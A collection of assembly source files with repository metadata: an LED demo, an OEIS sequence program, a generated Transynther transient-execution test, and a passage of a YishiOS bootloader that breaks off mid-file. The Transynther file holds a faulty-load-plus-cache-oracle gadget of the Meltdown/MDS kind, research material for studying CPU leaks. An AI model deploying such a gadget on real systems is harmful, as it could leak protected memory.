.dw 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.dw 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.dw 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.dw 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.dw 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
.end
| 78.625 | 147 | 0.412878 |
2d90e034918ec7469def3e13e386fddf0ef8f5d0 | 2,516 | asm | Assembly | leds_demo/leds_demo.asm | k12a-cpu/example-programs | e081c2eb439698bd32c7fbfc677bddb2e4e138c8 | [
"MIT"
] | null | null | null | leds_demo/leds_demo.asm | k12a-cpu/example-programs | e081c2eb439698bd32c7fbfc677bddb2e4e138c8 | [
"MIT"
] | 2 | 2016-05-29T17:36:12.000Z | 2016-05-29T17:36:58.000Z | leds_demo/leds_demo.asm | k12a-cpu/programs | e081c2eb439698bd32c7fbfc677bddb2e4e138c8 | [
"MIT"
] | null | null | null | ; Simple demo to display a pattern on the LEDs attached to digital output port 0.
; The I/O port connected to the digital outputs.
.define LEDS_PORT 0
start:
; Initialise stack pointer.
movi C, 0x90
movi D, 0x00
putsp
; Initialise A.
movi A, 0x01
; Update LEDs to contents of A.
out LEDS_PORT
; Fall through to loop_left.
loop_left:
; Wait some time.
rcall delay
; Logical-shift A left by one place.
mov B, A
add A, A, B
; Update LEDs with contents of A.
out LEDS_PORT
; If A == 0x80, go to loop_right, else go to loop_left.
skeqi 0x80 ; skip next instruction if A == 0x80
rjmp loop_left ; executed only if A != 0x80
; Otherwise, fall through to loop_right.
loop_right:
; Wait some time.
rcall delay
; Logical-shift A right by one place.
asr A, A
andi A, A, 0x7F ; The right shift is an arithmetic shift. We make it a logical shift by clearing the MSB, if it was set.
; Update LEDs with contents of A.
out LEDS_PORT
; If A == 0x01, go to loop_left, else go to loop_right.
skeqi 0x01 ; skip next instruction if A == 0x01
rjmp loop_right ; executed only if if A != 0x01
rjmp loop_left ; executed otherwise
; Delay for some time (a quarter of a second, assuming a 100 kHz clock).
; This subroutine clobbers C and D, but preserves B.
delay:
; Save contents of A.
push
; Save return address (in registers C and D).
mov A, D
push
mov A, C
push
; How to calculate starting value of CD:
; Let f = clock frequency, T = desired delay.
; Clock period = Δt = 1/f.
; Duration of one iteration of delay_loop = 17*Δt = 17/f.
; Number of iterations of delay_loop = T/(17/f) = T*f/17.
; Final value of CD counter = 0x00FF = 255 (loop ends as soon as C == 0).
; Starting value = 255 + number of iterations
; = 255 + T*f/17
; For 250ms delay at 100 kHz clock,
; Starting value = 255 + 0.25*100000/17
; = 1725
; = 0x06BD
movi C, 0x06
movi D, 0xBD
delay_loop:
dec ; (4 cycles) decrement CD
mov A, C ; (4 cycles) copy C to A
skeqi 0x00 ; (4 cycles) skip next instruction if A == 0x00
rjmp delay_loop ; (5 cycles) executed only if A != 0
; Restore return address.
pop
mov C, A
pop
mov D, A
; Restore A.
pop
; Return to caller.
ljmp
| 26.765957 | 125 | 0.598172 |
464730dba19ea836974c1300e4396237e22f5d25 | 332 | asm | Assembly | programs/oeis/166/A166496.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/166/A166496.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/166/A166496.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A166496: Prime plus the next composite.
; 6,7,11,15,23,27,35,39,47,59,63,75,83,87,95,107,119,123,135,143,147,159,167,179,195,203,207,215,219,227,255,263,275,279,299,303,315,327,335,347,359,363,383,387,395,399,423,447,455,459,467,479,483,503,515,527
seq $0,6005 ; The odd prime numbers together with 1.
mul $0,2
max $0,5
add $0,1
| 41.5 | 208 | 0.713855 |
18b4185b553e657f75f1df113294adbab00cee62 | 6,259 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_sm_/i7-7700_9_0xca.log_21829_1744.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_sm_/i7-7700_9_0xca.log_21829_1744.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_sm_/i7-7700_9_0xca.log_21829_1744.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r8
push %r9
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_WT_ht+0x1b305, %r8
cmp %r10, %r10
vmovups (%r8), %ymm6
vextracti128 $1, %ymm6, %xmm6
vpextrq $0, %xmm6, %rsi
and $63720, %rdx
lea addresses_WT_ht+0x10d05, %rsi
lea addresses_A_ht+0xb245, %rdi
clflush (%rsi)
sub $22251, %r8
mov $31, %rcx
rep movsq
nop
nop
nop
cmp $22668, %rdx
lea addresses_D_ht+0x7661, %rsi
nop
nop
nop
nop
xor $59852, %rdx
movb $0x61, (%rsi)
nop
nop
add $34135, %rsi
lea addresses_normal_ht+0xcec5, %rcx
nop
nop
xor %r9, %r9
movb $0x61, (%rcx)
nop
nop
nop
xor %rdx, %rdx
lea addresses_D_ht+0x7f3d, %rdx
nop
nop
nop
cmp %r10, %r10
mov (%rdx), %si
nop
nop
nop
nop
nop
cmp $50923, %rdi
lea addresses_UC_ht+0x167e5, %rdi
nop
nop
cmp $14471, %rsi
movb (%rdi), %dl
nop
nop
cmp $21683, %rcx
lea addresses_normal_ht+0xde19, %r9
nop
nop
and $20494, %rdx
vmovups (%r9), %ymm6
vextracti128 $0, %ymm6, %xmm6
vpextrq $1, %xmm6, %rdi
nop
nop
inc %r10
lea addresses_A_ht+0x9765, %r9
dec %rdi
mov (%r9), %rdx
nop
and $22332, %r9
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %r9
pop %r8
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r14
push %r15
push %r9
push %rax
push %rbp
push %rdx
push %rsi
// Store
mov $0x299, %r15
nop
nop
and %r9, %r9
movw $0x5152, (%r15)
nop
nop
nop
nop
nop
xor %r9, %r9
// Store
lea addresses_RW+0x2c05, %rsi
nop
nop
nop
dec %rax
movw $0x5152, (%rsi)
nop
nop
nop
sub $16614, %r14
// Faulty Load
lea addresses_RW+0x2c05, %rax
sub %rbp, %rbp
mov (%rax), %r14w
lea oracles, %rax
and $0xff, %r14
shlq $12, %r14
mov (%rax,%r14,1), %r14
pop %rsi
pop %rdx
pop %rbp
pop %rax
pop %r9
pop %r15
pop %r14
ret
/*
<gen_faulty_load>
[REF]
{'src': {'congruent': 0, 'AVXalign': False, 'same': False, 'size': 32, 'NT': False, 'type': 'addresses_RW'}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'congruent': 2, 'AVXalign': False, 'same': False, 'size': 2, 'NT': False, 'type': 'addresses_P'}}
{'OP': 'STOR', 'dst': {'congruent': 0, 'AVXalign': False, 'same': True, 'size': 2, 'NT': False, 'type': 'addresses_RW'}}
[Faulty Load]
{'src': {'congruent': 0, 'AVXalign': False, 'same': True, 'size': 2, 'NT': False, 'type': 'addresses_RW'}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'congruent': 7, 'AVXalign': False, 'same': True, 'size': 32, 'NT': False, 'type': 'addresses_WT_ht'}, 'OP': 'LOAD'}
{'src': {'congruent': 5, 'same': False, 'type': 'addresses_WT_ht'}, 'OP': 'REPM', 'dst': {'congruent': 6, 'same': False, 'type': 'addresses_A_ht'}}
{'OP': 'STOR', 'dst': {'congruent': 2, 'AVXalign': False, 'same': False, 'size': 1, 'NT': False, 'type': 'addresses_D_ht'}}
{'OP': 'STOR', 'dst': {'congruent': 5, 'AVXalign': False, 'same': False, 'size': 1, 'NT': False, 'type': 'addresses_normal_ht'}}
{'src': {'congruent': 2, 'AVXalign': False, 'same': False, 'size': 2, 'NT': False, 'type': 'addresses_D_ht'}, 'OP': 'LOAD'}
{'src': {'congruent': 5, 'AVXalign': False, 'same': False, 'size': 1, 'NT': False, 'type': 'addresses_UC_ht'}, 'OP': 'LOAD'}
{'src': {'congruent': 0, 'AVXalign': False, 'same': False, 'size': 32, 'NT': False, 'type': 'addresses_normal_ht'}, 'OP': 'LOAD'}
{'src': {'congruent': 2, 'AVXalign': False, 'same': True, 'size': 8, 'NT': False, 'type': 'addresses_A_ht'}, 'OP': 'LOAD'}
{'52': 21829}
52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52
*/
| 38.875776 | 2,999 | 0.652021 |
56a88fe71dbbe830942f999c8e32dc82b14acc42 | 20,049 | asm | Assembly | code/boot/loader.asm | yishiyu/YishiOS | f447cd8c16eaa63088e360929ec45143ed0359d4 | [
"MIT"
] | 1 | 2022-01-17T10:10:58.000Z | 2022-01-17T10:10:58.000Z | code/boot/loader.asm | yishiyu/YishiOS | f447cd8c16eaa63088e360929ec45143ed0359d4 | [
"MIT"
] | null | null | null | code/boot/loader.asm | yishiyu/YishiOS | f447cd8c16eaa63088e360929ec45143ed0359d4 | [
"MIT"
] | null | null | null | ;=======================================
; loader 程序
; 1. 获取内存的信息
; 2. 搜索并加载 kernel.bin
; 3. 进入保护模式(由于保护模式下仅根据偏移就能寻址 4G 的空间,所以不再在内核中划分不同的段)
; 4. 启动分页机制(根据得到的内存信息, 部分初始化页表)
; 5. 重新放置 kernel (kernel 文件为 elf 格式文件,与引导扇区一样,现在麻烦点可以给以后积累很多可以用的代码)
; 6. 跳转进入 kernel
;
; 代码布局:
; 数据定义
; 实模式代码
; 实模式函数定义
; 保护模式代码
; 保护模式函数定义
;=======================================
jmp loader_start
%include "pm.inc"
%include "loader.inc"
; GDT (全局描述符表) ------------------------------------------------------------------------------------------------------------------------------------------
; 注意这个空描述符是不能删的,否则跳转进保护模式的时候会发生错误
; 段基址 段界限 , 属性
LABEL_GDT: Descriptor 0, 0, 0 ; 空描述符
LABEL_DESC_FLAT_C: Descriptor 0, 0fffffh, DA_CR | DA_32 | DA_LIMIT_4K ; 0 ~ 4G(靠偏移寻址)
LABEL_DESC_FLAT_RW: Descriptor 0, 0fffffh, DA_DRW | DA_32 | DA_LIMIT_4K ; 0 ~ 4G(靠偏移寻址)
LABEL_DESC_VIDEO: Descriptor 0B8000h, 0ffffh, DA_DRW | DA_DPL3 ; 显存首地址
GdtLen equ $ - LABEL_GDT
; GDT -----------------------------------------------------------------------------------------------------------------------------------------------------------------
GdtPtr:
dw GdtLen - 1 ; 段界限, 根据全局描述符个数确定
dd Loader_Phy_Address + LABEL_GDT ; 段基址
;需要注意的是GdtPtr并不仅是一个段基址,而是一个数据结构
;让GdtPtr基地址8字节对齐可提高速度 (提高查询全局描述符速度),但是太麻烦了...
; GDT Selector (全局描述符表选择子) ---------------------------------------------------------------------------------------------------------------------
SelectorFlatC equ LABEL_DESC_FLAT_C - LABEL_GDT ; 全局 32位 可执行可读 0级 代码段描述符 范围为0 ~ 4G
SelectorFlatRW equ LABEL_DESC_FLAT_RW - LABEL_GDT ; 全局 32位 可读可写 0级 数据段描述符 范围为0 ~ 4G
SelectorVideo equ LABEL_DESC_VIDEO - LABEL_GDT + SA_RPL3 ; 全局 32位 可读可写 3级 显存段描述符 段长度为1Mb
; GDT Selector ------------------------------------------------------------------------------------------------------------------------------------------------------
; 字符串 -----------------------------------------------------------------------------------------------------------------------------------------------------------------
; 需要注意的是,这里定义的变量和函数只能在实模式下使用,在保护模式下寻址机制会发生改变
; kernel 文件名
Kernel_File_Name: db "kernel.bin"
Kernel_File_Name_Length equ $ - Kernel_File_Name
; 显示用的字符串
Message_Length equ 13
Message:
db "Loading "
db "kernel found "
db "kernel loaded"
db "No kernel "
; 字符串 -----------------------------------------------------------------------------------------------------------------------------------------------------------------
; 实模式变量和宏 ----------------------------------------------------------------------------------------------------------------------------------------------------
; 把堆栈定义为 0x20000 ~ 0x20400 共1kb空间
; 跳入保护模式后会重新设置栈, 所以仅在实模式下这些空间足够用了
; Orange's OS 中于渊老哥设置的堆栈为cs:00h ~ cs:100h
; 有点奇怪栈区和代码区这么不会冲突吗...
Stack_Base equ 02000h
Stack_Top equ 0400h
; 实模式变量和宏 ----------------------------------------------------------------------------------------------------------------------------------------------------
; 保护模式变量和宏 -------------------------------------------------------------------------------------------------------------------------------------------------
; 需要注意的是是模式和保护模式都能使用这里定义的变量, 不过访问的方式不太一样
[SECTION .data1]
ALIGN 32
Data_Section:
; 实模式下使用这些符号-------------------------
; 变量
; 其实这里确实是包括ROM在内的总的内存的大小
_Mem_Size: dd 0 ; 总的内存大小
_Mem_Check_Result_Number: dd 0 ; 记录最终得到的检查结果描述符数量
_ARDStruct: ; Address Range Descriptor Structure -- 描述内存检查结果的数据结构
_ARD_Base_L: dd 0
_ARD_Base_H: dd 0
_ARD_Length_L: dd 0
_ARD_Length_H: dd 0
_ARD_Type: dd 0
_Mem_Check_Buf: times 156 db 0 ; 检查内存大小时用到的缓冲区
; 用来读取硬盘的数据结构
_Disk_Address_Packet:
db 0x10 ; [ 0 ] 数据结构的长度,单位为byte
db 0 ; [ 1 ] 保留位,取0
db 2 ; [ 2 ] 读取的块数,超级块1k占用两个扇区(块)
db 0 ; [ 3 ] 保留位,取0
dw RootDir_Offset ; [ 4 ] 写入内存位置的偏移
dw RootDir_Base ; [ 6 ] 写入内存位置的段
dd 0 ; [ 8 ] LBA. Low 32-bits.
dd 0 ; [12] LBA. High 32-bits.
; 屏幕上当前写的位置
_Disp_Pos: dd (80 * 6 + 0) * 2 ; 第6行 第0个 (6 ,0)
; 字符串
_Char_Return: db 0Ah, 0
_Test_message: db "jojo! Protect Mode !!!",0
_Page_Init_Success: db "jojo! Page init successfully !!!",0
_Init_Kernel_Success: db "jojo! kernel is ready !!!", 0
_Mem_Info_Title: db "BaseAddrL BaseAddrH LengthLow LengthHigh Type", 0Ah, 0
_Mem_Size_Title: db "Memory size: ", 0
; 保护模式下使用这些符号-------------------------
; 变量
Mem_Check_Result_Number equ Loader_Phy_Address + _Mem_Check_Result_Number
ARDStruct equ Loader_Phy_Address + _ARDStruct
ARD_Base_L equ Loader_Phy_Address + _ARD_Base_L
ARD_Base_H equ Loader_Phy_Address + _ARD_Base_H
ARD_Length_L equ Loader_Phy_Address + _ARD_Length_L
ARD_Length_H equ Loader_Phy_Address + _ARD_Length_H
ARD_Type equ Loader_Phy_Address + _ARD_Type
Mem_Check_Buf equ Loader_Phy_Address + _Mem_Check_Buf
Disk_Address_Packet equ Loader_Phy_Address + _Disk_Address_Packet
Disp_Pos equ Loader_Phy_Address + _Disp_Pos
Test_message equ Loader_Phy_Address + _Test_message
Char_Return equ Loader_Phy_Address + _Char_Return
Mem_Info_Title equ Loader_Phy_Address + _Mem_Info_Title
RAM_Size_Title equ Loader_Phy_Address + _Mem_Size_Title
Mem_Size equ Loader_Phy_Address + _Mem_Size
Page_Init_Success equ Loader_Phy_Address + _Page_Init_Success
Init_Kernel_Success equ Loader_Phy_Address + _Init_Kernel_Success
; 保护模式变量和宏 -------------------------------------------------------------------------------------------------------------------------------------------------
loader_start:
mov ax, cs
mov ds, ax
mov es, ax
mov ax, Stack_Base
mov ss, ax
mov sp, Stack_Top
mov dx, 0300h
call DispStr_In_RealMode
; 得到内存数
mov ebx, 0 ; ebx = 后续值, 开始时需为 0
mov di, _Mem_Check_Buf ; es:di 指向一个地址范围描述符结构 (Address Range Descriptor Structure)
Mem_Check:
mov eax, 0E820h ; eax = 0000E820h 对应的功能为检查内存
mov ecx, 20 ; ecx = 地址范围描述符结构的大小
mov edx, 0534D4150h ; edx = 'SMAP'
int 15h ; int 15h
jc Mem_Check_Fail ; 获得内存失败
add di, 20
inc dword [_Mem_Check_Result_Number] ; 检查成功, 增加检查结果描述符计数器
cmp ebx, 0
jne Mem_Check
jmp Mem_Check_Done
Mem_Check_Fail:
mov dword [_Mem_Check_Result_Number], 0
jmp $
Mem_Check_Done:
; 在C盘根目录寻找kernel.bin 文件
; 不知道根目录检查loader.bin的时候检查到了哪里, 所以需要从头进行
;得到inode结构体
;es:bx => 2号inode
mov eax, 2
call get_inode
; 从根目录中寻找kernel.bin
;读取根目录
mov word [_Disk_Address_Packet + 4], RootDir_Offset
mov word [_Disk_Address_Packet + 6], RootDir_Base
mov eax, [es:bx + Inode_Block]
add eax,eax
mov dword [_Disk_Address_Packet + 8], eax
mov dword [_Disk_Address_Packet + 12], 0
;先获取根目录占用的block数量
;最多只搜索根目录前12个block
mov eax, [es:bx + Inode_Blocks]
shr eax, 1
mov cx, ax
cmp cx, 12
jle root_dir_read
mov cx, 12
;bx = inode中inode_block数据的地址
;cx = 剩余未搜索block数量
;es = InodeTable的基地址
;读取根目录的一个block,减少block计数并修改数据结构
root_dir_read:
cmp cx, 0
je kernel_not_found
call read_sector
dec cx
add bx,4
mov eax,[es:bx]
add eax,eax
mov dword [_Disk_Address_Packet + 8], eax
;搜索当前读取到的block
root_dir_search:
; bx = 在当前根目录中读取指针的偏移
; ds:si = 正确的文件名字
; gs:bx = 当前磁盘上目录项
pusha
mov si,Kernel_File_Name
mov eax, RootDir_Base
mov gs,eax
mov bx, RootDir_Offset
root_file_match:
; 对比名字长度
file_length_cmp:
xor cx,cx
mov cl, Kernel_File_Name_Length
cmp cl, byte [gs:bx+Name_Len_Offset]
jnz file_not_match
mov si,Kernel_File_Name
push bx
; 对比名字
file_name_cmp:
lodsb ; ds:si -> al
;只有bx能当做基址寄存器
cmp al, byte[gs:bx+File_Name_Offset]
jnz file_name_cmp_end
dec cl
jz file_name_cmp_end
inc bx
jmp file_name_cmp
file_name_cmp_end:
;离开对比名字这一段之前必须恢复bx
pop bx
cmp cl, 0
jnz file_not_match
jmp kernel_found
file_not_match:
add bx, word [gs:bx+Record_Length_Offset]
cmp bx,1024
jl root_file_match
popa
jmp root_dir_read
kernel_not_found:
mov dx, 0403h
call DispStr_In_RealMode
jmp $
kernel_found:
mov dx, 0401h
call DispStr_In_RealMode
kernel_load:
; 加载kernel.bin
; gs:bx => 当前目录项的指针
mov eax, dword [gs:bx + Inode_Number_Offset]
call get_inode
mov word [_Disk_Address_Packet + 4], Kernel_File_Offset
mov word [_Disk_Address_Packet + 6], Kernel_File_Base
call loade_file
; 到目前位置已经把kernel.bin 移入了内存
kernel_ready:
mov dx, 0502h
call DispStr_In_RealMode
; 准备进入保护模式
; 加载 GDTR
lgdt [GdtPtr]
; 关中断
cli
; 打开地址线A20
in al, 92h
or al, 00000010b
out 92h, al
; 准备切换到保护模式
mov eax, cr0
or eax, 1
mov cr0, eax
; 真正进入保护模式
; 一个神奇的跳转: 16位的代码却使用了32位的操作数
jmp dword SelectorFlatC:(Loader_Phy_Address+Protect_Mode_Start)
;======================================
; DispStr_In_RealMode
; dh 表示要显示行数
; dl 表示要显示的信息的编号
; 需要注意的是boot程序已经在前两行显示了东西了
;======================================
DispStr_In_RealMode:
;刚开始没加保护寄存器现场...加载内核的时候这个函数改变了bx寄存器...透..
;透...刚开始把这个放在了32位代码段的后面,自动变成了32为代码段....
;看来必须重新调整一下函数和代码的顺序了
pusha
mov cx, Message_Length ; CX = 串长度
mov ax, Message_Length
mul dl
add ax, Message
mov bp, ax ; ┓
mov ax, ds ; ┣ ES:BP = 串地址
mov es, ax ; ┛
mov ax, 01301h ; AH = 13, AL = 01h
mov bx, 0007h ; 页号为0(BH = 0) 黑底白字(BL = 07h)
mov dl, 0
int 10h ; int 10h
popa
ret
;======================================
; get_inode
; 获取inode号对应的inode
; eax = 目标inode号
; 结束后es:bx指向目标inode
;======================================
get_inode:
;把获取到的inode所在的block放在InodeTable处
;修改es和bx使其指向目标inode
mov word [_Disk_Address_Packet + 4], InodeTable_Offset
mov word [_Disk_Address_Packet + 6], InodeTable_Base
dec eax ;需要注意的是inode的编号是从1开始的
mov bl,8 ;每个block可以存放8个inode
div bl ; al => 商,单位为block
mov cl, ah ; cl => 余数,为block内偏移
xor ah, ah
mov bx, GroupDescriptors_Base
mov es, bx
mov ebx, dword [es:GroupDescriptors_Offset + 8] ;获取inode table首地址,单位为block
add eax, ebx ; eax => 所在的总的block
add eax, eax ; eax => 所在的总的扇区号
mov dword [_Disk_Address_Packet + 8], eax
call read_sector
mov bx, InodeTable_Base
mov es, bx
mov al, cl
mov bl, Inode_Length
mul bl
mov bx,ax
ret
;======================================
; read_sector
; 调用前需要设置好Disk_Address_Packet结构体
; 使用前后寄存器会发生改变,为了节省空间不再管这个了
;======================================
read_sector:
pusha
xor ebx, ebx
mov ah, 042h
mov dl, 080h ; c 盘盘符
mov si, _Disk_Address_Packet
int 0x13
popa
ret
;======================================
; loade_file
; 根据inode加载file,最大支持加载前12个block,即12k,对于一个loader足够大了
; es:bx 指向文件inode
; 内存目标地址需要实现填充在访问磁盘的数据结构中
;======================================
loade_file:
; 判断文件大小
; 在这里不提供虚拟内存服务,最多扩展到1级索引
; 最大的加载大小为12 + 256 = 268 kb
; inode 40-99 bytes 描述指向数据的block号(60bytes 描述了15个block)
; 一个block能存放1024/4 = 256 个block号
;前12个block为直接索引
;第13个block为一级索引
;第14个block为二级索引
;低15个block为三级索引
;保存原始的bx
push bx
; 读取直接索引的block
mov ecx, dword [es:bx + Inode_Blocks]
cmp ecx, 24 ;直接索引最大支持24个扇区
jbe direct_block
mov ecx,24
direct_block:
mov byte [_Disk_Address_Packet + 2], 2 ;分多次读取,每次读取一个block
read_direct_block:
mov eax, dword [es:bx + Inode_Block]
add bx, 4
add eax, eax
mov dword [_Disk_Address_Packet + 8], eax
;读取磁盘并使内存目的地址指向下一个block
call read_sector
add word [_Disk_Address_Packet + 4], 0x400
sub ecx, 2
ja read_direct_block
;暂存下一个block的位置
mov ax, bx
; 恢复原始的bx
pop bx
;判断有没有一级索引的block没有读
mov ecx, dword [es:bx + Inode_Blocks]
cmp ecx, 24
jbe loade_file_end
sub ecx, 24 ;获取还需要读的扇区数
;恢复指向下一个block的位置
mov bx, ax
;保存当前文件的内存写入位置
push dword [_Disk_Address_Packet + 4]
push dword [_Disk_Address_Packet + 6]
; 读取直接索引的block
; 读取索引block
mov eax, dword [es:bx + Inode_Block]
add eax, eax
mov dword [_Disk_Address_Packet + 8], eax
mov word [_Disk_Address_Packet + 4], First_Index_Block_Offset
mov word [_Disk_Address_Packet + 6], First_Index_Block_Base
call read_sector
; 根据索引block读取
;调整es和bx
mov ax, First_Index_Block_Base
mov es, ax
mov bx, First_Index_Block_Offset
;恢复原本文件的内存写入位置
pop dword [_Disk_Address_Packet + 6]
pop dword [_Disk_Address_Packet + 4]
read_first_index_block:
mov eax, dword [es:bx]
add bx, 4
add eax, eax
mov dword [_Disk_Address_Packet + 8], eax
;读取磁盘并使内存目的地址指向下一个block
call read_sector
add word [_Disk_Address_Packet + 4], 0x400
sub ecx, 2
ja read_first_index_block
loade_file_end:
ret
; 从此跨入 保护模式 的大门 ---------------------------------------------------------
; 32 位代码段. 由实模式跳入 ---------------------------------------------------------
[SECTION .s32]
ALIGN 32
[BITS 32]
Protect_Mode_Start:
mov ax, SelectorVideo
mov gs, ax
mov ax, SelectorFlatRW
mov ds, ax
mov es, ax
mov fs, ax
mov ss, ax
mov esp, Protect_Mode_Stack_Top
;显示进入信息
push Test_message
call DispStr
call DispReturn
call DispReturn
add esp, 4
;显示内存信息
call DispMemInfo
;启动分页机制
call SetupPaging
call DispReturn
call DispReturn
push Page_Init_Success
call DispStr
call DispReturn
add esp, 4
;重新放置内核
call InitKernel
push Init_Kernel_Success
call DispStr
call DispReturn
add esp, 4
mov ax,SelectorVideo
mov gs,ax
;***************************************************************
jmp SelectorFlatC:Kernel_Enter_point ; 正式进入内核
;***************************************************************
; ------------------------------------------------------------------------
; 显示 AL 中的数字
; ------------------------------------------------------------------------
DispAL:
push ecx
push edx
push edi
mov edi, [Disp_Pos]
mov ah, 0Fh ; 0000b: 黑底 1111b: 白字
mov dl, al
shr al, 4
mov ecx, 2
num_trans:
; 把al中的数字转化成ascii码
and al, 01111b
cmp al, 9
ja big_num
add al, '0'
jmp display
big_num:
; 对大于9的数字特殊处理
sub al, 0Ah
add al, 'A'
display:
;对显存进行操作
mov [gs:edi], ax
add edi, 2
mov al, dl
loop num_trans
mov [Disp_Pos], edi
pop edi
pop edx
pop ecx
ret
; DispAL 结束-------------------------------------------------------------
; ------------------------------------------------------------------------
; DispInt
; 显示一个整形数
; 通过堆栈传递一个Int参数
